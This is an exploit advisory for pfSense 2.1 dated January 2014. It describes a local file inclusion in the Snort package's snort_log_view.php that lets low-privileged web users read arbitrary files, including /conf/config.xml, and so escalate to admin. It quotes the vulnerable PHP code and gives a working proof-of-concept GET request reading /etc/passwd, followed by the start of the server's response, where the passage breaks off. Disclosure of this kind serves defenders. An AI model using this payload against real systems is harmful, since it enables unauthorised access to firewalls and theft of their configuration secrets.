###################################################################### # _ ___ _ _ ____ ____ _ _____ # | | / _ \| \ | |/ ___|/ ___| / \|_ _| # | | | | | | \| | | _| | / _ \ | | # | |__| |_| | |\ | |_| | |___ / ___ \| | # |_____\___/|_| \_|\____|\____/_/ \_\_| # # Exploit Title: pfSense 2.1 Privilege Escalation from less privileged users (LFI/RCE) # Date: 25/01/2014 (0-day) # Exploit Author: @u0x (Pichaya Morimoto) # Software Link: www.pfsense.org # Category: Local File Inclusion (LFI) & Privilege Escalation # Version: pfSense 2.1 build 20130911-1816 with snort 2.9.5.5 pkg v.3.0.2 # ##################################################################### pfSense firewall/router distribution description : ====================================================================== pfSense is a free, open source customized distribution of FreeBSD tailored for use as a firewall and router. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. pfSense is a popular project with more than 1 million downloads since its inception, and proven in countless installations ranging from small home networks protecting a PC and an Xbox to large corporations, universities and other organizations protecting thousands of network devices. This project started in 2004 as a fork of the m0n0wall project, but focused towards full PC installations rather than the embedded hardware focus of m0n0wall. pfSense also offers an embedded image for Compact Flash based installations, however it is not our primary focus. Attack Scenario ====================================================================== Authenticated users with only permission to access some packages in web gui (a.k.a. webConfigurator) will be able to escalate themselves to other privileged admin by reading /conf/config.xml file through bugs (i.e. Snort LFI), result in fully compromise the pfSense. This attack abuse the user privilege scheme with some of official packages (System > Package Manager) * Session Hijacking also possible to steal less privileged user sessions to perform this trick due to "http" admin by default webConfigurator. Sample bug #1 : Snort Admin Privilege Escalation via Local File Inclusion Vulnerability Vulnerable file: ====================================================================== snort_log_view.php [+] Checksum SHA1: ec1330e804eb028f2410c8ef9439df103bb2764c MD5: cd767e46a4e9e09ede7fd26560e37f14 Vulnerable Source Code : ====================================================================== http://www.pfsense.com/packages/config/snort/snort_log_view.php https://github.com/pfsense/pfsense-packages/blob/master/config/snort/snort_log_view.php …(deducted)... $contents = ''; // Read the contents of the argument passed to us. // Is it a fully qualified path and file? if (file_exists($_GET['logfile'])) $contents = file_get_contents($_GET['logfile']); // It is not something we can display, so print an error. else $contents = gettext("\n\nERROR -- File: {$_GET['logfile']} not found!"); $pgtitle = array(gettext("Snort"), gettext("Log File Viewer")); ?> …(deducted)... …(deducted)... Proof of Concept 1 : Arbitrary File Inclusion ====================================================================== GET /snort/snort_log_view.php?logfile=/etc/passwd HTTP/1.1 Host: firewall1.pentestlab1:1337 Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: th,en-US;q=0.8,en;q=0.6 Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083 HTTP/1.1 200 OK Expires: Mon, 27 Jan 2014 07:25:10 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=180000 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 25 Jan 2014 05:25:10 GMT X-Frame-Options: SAMEORIGIN Pragma: no-cache Content-type: text/html Transfer-Encoding: chunked Date: Sat, 25 Jan 2014 05:25:10 GMT Server: lighttpd/1.4.32 …(deducted)...